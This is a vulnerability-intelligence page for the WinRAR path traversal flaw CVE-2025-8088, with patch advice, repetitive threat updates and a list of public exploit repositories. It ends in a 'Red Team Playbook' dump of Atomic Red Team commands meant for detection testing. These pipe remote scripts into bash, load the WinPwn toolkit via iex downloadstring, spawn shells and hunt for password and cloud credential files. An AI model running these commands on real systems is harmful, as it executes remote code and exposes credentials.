CVE-2025-8088
Overview
This vulnerability is a path traversal flaw within the Windows version of WinRAR, specifically in the archive extraction component. The root cause lies in improper validation of file paths inside crafted archive files, allowing directory traversal sequences to bypass intended extraction directories. This flaw affects the archive parsing and extraction logic responsible for handling file paths during decompression.
Vulnerability Description
A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.
Impact
An attacker can execute arbitrary code on the victim's Windows system by convincing the user to open a maliciously crafted archive file, without requiring prior authentication. This enables full system compromise, including installation of malware, data theft, or lateral movement within a network. The vulnerability has been exploited in the wild, demonstrating its practical impact on confidentiality, integrity, and availability of affected systems.
Solution
WinRAR has released a security update addressing this path traversal vulnerability in the Windows version. Users should update to the latest WinRAR release as detailed in the official advisory at https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5. Applying this update will correct the path validation logic to prevent traversal attacks. No alternative workarounds are recommended by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The path traversal vulnerability in the Windows version of WinRAR poses a significant security risk by allowing attackers to execute arbitrary code through the manipulation of malicious archive files. This type of vulnerability occurs when an application does not properly validate user input, enabling an attacker to craft a file path that can traverse outside the intended directory structure. In this case, the flaw exists in how WinRAR processes archive files, leading to the potential extraction of files to arbitrary locations on the file system. The exploitation of this vulnerability can result in the execution of harmful payloads, which can compromise the integrity and confidentiality of the affected system.
Attack vectors for this vulnerability primarily involve social engineering tactics, where an attacker may distribute malicious archive files via email, file-sharing platforms, or other means. Once a user unwittingly extracts the contents of the archive using WinRAR, the crafted file paths can lead to the execution of malicious scripts or binaries. For instance, an attacker could embed a payload that, when extracted, runs a script that installs malware or creates a backdoor for further exploitation. This exploitation scenario highlights the importance of user awareness and the need for robust security practices, as even a single user falling victim can lead to widespread compromise within an organization.
The real-world impact of this vulnerability is considerable, particularly for businesses that rely on WinRAR for file compression and extraction. Given the high CVSS score of 8.8, the severity of potential exploits is significant, with the risk of data breaches, loss of sensitive information, and disruption of services. Organizations that fail to address this vulnerability may face financial losses, reputational damage, and potential legal ramifications due to non-compliance with data protection regulations. Moreover, the exploitation of this vulnerability in the wild underscores the urgency for organizations to prioritize their cybersecurity posture and implement proactive measures to safeguard their systems.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating WinRAR and other affected software is crucial, as software vendors typically release patches to address known vulnerabilities. Additionally, implementing robust endpoint protection solutions can help identify and block malicious files before they are executed. User education and training are also vital components of a comprehensive security strategy, ensuring that employees are aware of the risks associated with opening unknown files and the importance of verifying the source of any downloaded content.
In conclusion, the path traversal vulnerability in WinRAR exemplifies the complexities of modern cybersecurity threats and the necessity for organizations to remain vigilant. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against such vulnerabilities. Through a combination of timely software updates, effective detection mechanisms, and user education, organizations can significantly reduce their risk exposure and enhance their overall security posture in an increasingly hostile digital landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-8088, accompanied by the emergence of several new proof-of-concept tools that enhance the accessibility and sophistication of attacks leveraging this WinRAR path traversal vulnerability. Our telemetry indicates that threat actors are increasingly adopting these publicly available exploit frameworks, which now include advanced features such as username-independent targeting and manipulation of alternate data streams (ADS) within RAR5 headers. This evolution broadens the attack surface and lowers the technical barrier for exploitation, potentially accelerating the spread of malicious archives in the wild. Although ransomware usage linked to this vulnerability remains undetermined, the expanded exploit toolkit raises the likelihood of integration into automated attack chains and opportunistic campaigns. Consequently, the threat level associated with CVE-2025-8088 should be considered elevated, reflecting both the increased frequency of exploitation attempts and the growing sophistication of adversary capabilities observed through our sensors.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-8088, accompanied by the emergence of several new proof-of-concept exploit tools circulating within attacker communities. This development broadens the exploit landscape, effectively lowering the technical barriers for adversaries to weaponize the vulnerability. Although the overall exploit probability score has increased modestly, the proliferation of publicly available exploit frameworks signals a growing adversary interest and capability to integrate this vulnerability into automated attack chains. Our telemetry further indicates that while ransomware usage linked to this flaw remains unconfirmed, the expanding toolkit and heightened exploitation activity elevate the risk of opportunistic and targeted campaigns leveraging this vector. Consequently, defenders should recognize an elevated threat posture for CVE-2025-8088, reflecting both the increased frequency of exploitation attempts and the enhanced sophistication of adversary tactics observed through our sensors.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-8088, with telemetry indicating a substantial increase in observed activity and a significant rise in the Exploit Prediction Scoring System (EPSS) score. This upward trend reflects growing adversary confidence and capability to weaponize the path traversal vulnerability in WinRAR, as evidenced by the proliferation of new proof-of-concept exploits circulating in public repositories. The expanding availability of these tools lowers the barrier for threat actors to integrate this vulnerability into automated attack frameworks, thereby amplifying the risk of widespread exploitation. Although ransomware campaigns linked to this flaw remain unconfirmed, the intensifying exploitation activity and enhanced adversary tooling suggest an elevated likelihood of opportunistic and targeted attacks leveraging this vector. Consequently, the threat level associated with CVE-2025-8088 has increased, underscoring the need for heightened vigilance and proactive monitoring within affected environments.
Update 4 — June 15, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-8088, as evidenced by a sharp increase in telemetry signals and a substantial rise in the Exploit Prediction Scoring System (EPSS) metric. This surge reflects a growing adversary focus on leveraging the path traversal vulnerability in WinRAR, facilitated by the proliferation of new proof-of-concept exploits publicly available on multiple platforms. The rapid amplification of exploitation activity indicates that threat actors are increasingly integrating this vulnerability into their operational toolsets, raising the probability of more frequent and sophisticated attacks. Although ransomware campaigns exploiting this flaw remain unconfirmed, the heightened exploitation trend and expanding adversary capabilities elevate the overall threat posture. Defenders should recognize that the vulnerability’s exploitation window is widening, increasing the urgency for enhanced detection and response efforts within affected environments.
Update 5 — June 22, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-8088, with telemetry indicating a sustained upward trend in malicious archive file detections. This increase aligns with a rapidly rising EPSS score, reflecting growing adversary interest and operational integration of this WinRAR path traversal vulnerability. Concurrently, multiple new proof-of-concept exploits have surfaced on public repositories, broadening the toolkit available to threat actors and lowering the barrier for exploitation. Although ransomware campaigns leveraging this vulnerability remain unconfirmed, the expanding exploitation landscape and enhanced exploit availability significantly elevate the risk of widespread compromise. Defenders should interpret this as an intensification of the threat environment, underscoring the urgency to prioritize detection and monitoring efforts for this vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rarlab | Winrar | All |
cpe:2.3:a:rarlab:winrar:*:*:*:*:*:*:*:*
|
|
|
Dtsearch | Dtsearch | All |
cpe:2.3:a:dtsearch:dtsearch:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (33)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-
CVE-2025-8088 WinRAR Proof of Concept (PoC-Exploit)
|
sxyrxyy | 72 | 30 | 2025-08-13 | View |
|
onlytoxi/CVE-2025-8088-Winrar-Tool
Advanced WinRAR Path Traversal Exploit Tool for CVE-2025-8088
|
onlytoxi | 55 | 17 | 2025-08-14 | View |
|
hexsecteam/CVE-2025-8088-Winrar-Tool
A sophisticated GUI tool for creating malicious RAR archives that exploit the WinRAR path traversal vulnerability (CVE-2...
|
hexsecteam | 44 | 16 | 2025-09-04 | View |
|
knight0x07/WinRAR-CVE-2025-8088-PoC-RAR
WinRAR 0day CVE-2025-8088 PoC RAR Archive
|
knight0x07 | 43 | 12 | 2025-08-12 | View |
|
pentestfunctions/CVE-2025-8088-Multi-Document
Exploit systems using older WinRAR without knowing their username (unlike other projects)
|
pentestfunctions | 37 | 4 | 2025-08-16 | View |
|
aldisakti2/CVE-2025-8088-BUILDER-Winrar-Tool
CVE-2025-8088-BUILDER
|
aldisakti2 | 28 | 9 | 2024-05-26 | View |
|
jordan922/CVE-2025-8088
Python tool for safe archive handling, path traversal awareness, and secure extraction. Inspired by CVE-2025-8088.
|
jordan922 | 10 | 4 | 2025-08-10 | View |
|
AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal
An engaging walkthrough on uncovering, patching, and securing the WinRAR CVE-2025-8088 with a hands-on hacker’s twist.
|
AdityaBhatt3010 | 12 | 0 | 2025-08-26 | View |
|
kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition
A high-performance, memory-safe implementation of the WinRAR CVE-2025-8088 exploit tool, rewritten in Rust for better re...
|
kitsuneshade | 8 | 3 | 2025-08-27 | View |
|
lucyna77/winrar-exploit
CVE-2025-8088 exploit C++ impl
|
lucyna77 | 9 | 2 | 2025-09-25 | View |
|
starfallreverie/winrar-exploit
CVE-2025-8088 exploit C++ impl
|
starfallreverie | 8 | 2 | 2025-09-25 | View |
|
pentestfunctions/best-CVE-2025-8088
Winrar CVE exploitation before 7.13 using multiple ADS streams on a single file (Custom PDF implementation)
|
pentestfunctions | 10 | 0 | 2025-08-27 | View |
|
lennertdefauw/CVE-2025-8088
WinRAR < 7.13 path traversal for persistency
|
lennertdefauw | 5 | 2 | 2026-03-25 | View |
|
walidpyh/CVE-2025-8088
|
walidpyh | 5 | 2 | 2025-08-27 | View |
|
Syrins/CVE-2025-8088-Winrar-Tool-Gui
A Windows GUI tool demonstrating a proof-of-concept archive traversal technique related to CVE-2025-8088 using WinRAR’s ...
|
Syrins | 3 | 3 | 2025-08-20 | View |
|
Markusino488/cve-2025-8088
🛠 Exploit CVE-2025-8088 with this Python tool to generate malicious WinRAR archives that ensure payload persistence in W...
|
Markusino488 | 2 | 2 | 2025-12-20 | View |
|
pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC
Proof-of-Concept for CVE-2025-8088 vulnerability in WinRAR (path traversal via ADS)
|
pexlexity | 2 | 1 | 2025-08-17 | View |
|
travisbgreen/cve-2025-8088
cve-2025-8088_detection
|
travisbgreen | 2 | 0 | 2025-08-11 | View |
|
undefined-name12/CVE-2025-8088-Winrar
Herramienta avanzada de explotación transversal de ruta de WinRAR para CVE-2025-8088
|
undefined-name12 | 2 | 0 | 2026-02-14 | View |
|
pescada-dev/-CVE-2025-8088
POWERSHEL script to check if your device is affected or no
|
pescada-dev | 1 | 1 | 2025-08-26 | View |
|
0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC
|
0xAbolfazl | 1 | 0 | 2025-08-15 | View |
|
DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
|
DeepBlue-dot | 1 | 0 | 2025-08-26 | View |
|
Shinkirou789/Cve-2025-8088-WinRar-vulnerability
|
Shinkirou789 | 1 | 0 | 2025-09-17 | View |
|
Jessica74016/CVE-2025-8088
CVE-2025-8088 — Educational proof-of-concept for WinRAR path traversal vulnerability via NTFS Alternate Data Streams (AD...
|
Jessica74016 | 1 | 0 | 2026-03-07 | View |
|
ilhamrzr/RAR-Anomaly-Inspector
Defensive PowerShell tool for static inspection of RAR archives and detection of CVE-2025-8088 path traversal anomalies.
|
ilhamrzr | 1 | 0 | 2026-01-11 | View |
|
xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit
|
xi0onamdev | 0 | 1 | 2025-11-29 | View |
|
Lewis-Ricardo/Amaranth-Project
CVE-2025-8088 exploitation chain + Quasar C2 multi-stage payload delivery
|
Lewis-Ricardo | 0 | 0 | 2026-06-26 | View |
|
shaheeryasirofficial/CVE-2025-8088
CVE-2025-8088 is a critical path traversal vulnerability in WinRAR 7.12
|
shaheeryasirofficial | 0 | 0 | 2026-04-07 | View |
|
nhattanhh/CVE-2025-8088
CVE-2025-8088
|
nhattanhh | 0 | 0 | 2025-08-19 | View |
|
ghostn4444/CVE-2025-8088
This PoC is for authorized study and testing. CVE-2025-8088 is actively exploited, and misuse may violate laws or cause ...
|
ghostn4444 | 0 | 0 | 2025-08-21 | View |
|
hbesljx/CVE-2025-8088-EXP
WinRAR漏洞CVE-2025-8088的payload一键生成工具
|
hbesljx | 0 | 0 | 2025-09-18 | View |
|
IsmaelCosma/CVE-2025-8088
|
IsmaelCosma | 0 | 0 | 2026-02-11 | View |
|
techcorp/CVE-2025-8088-Exploit
A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates...
|
techcorp | 0 | 0 | 2025-09-14 | View |
Threat Feed
28 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.